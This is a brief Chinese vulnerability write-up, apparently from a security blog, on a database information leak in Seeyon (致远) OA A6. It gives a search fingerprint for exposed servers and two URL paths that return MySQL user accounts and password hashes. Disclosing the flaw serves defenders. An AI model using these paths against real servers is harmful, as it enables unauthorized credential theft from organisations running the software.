致远OA A6 createMysql.jsp 数据库敏感信息泄露

漏洞描述

致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5。

漏洞影响

致远OA A6

网络测绘

title=”致远A8+协同管理软件.A6″

漏洞复现

当访问如下URL时执行了SQL语句 select *from mysql.user; 进行查询并返回到页面中

/yyoa/createMysql.jsp
/yyoa/ext/createMysql.jsp

20240111161356280-1645629877032-94a29b56-2632-4bff-8fbc-75dac6ab2ae6.120d6d17_2024-01-11_16-13-48 (1)

20240111161439219-1645629883438-65aaa8f2-5d16-48a7-a92b-a5e37a737f71.e8ada7a8_2024-01-11_16-14-24 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容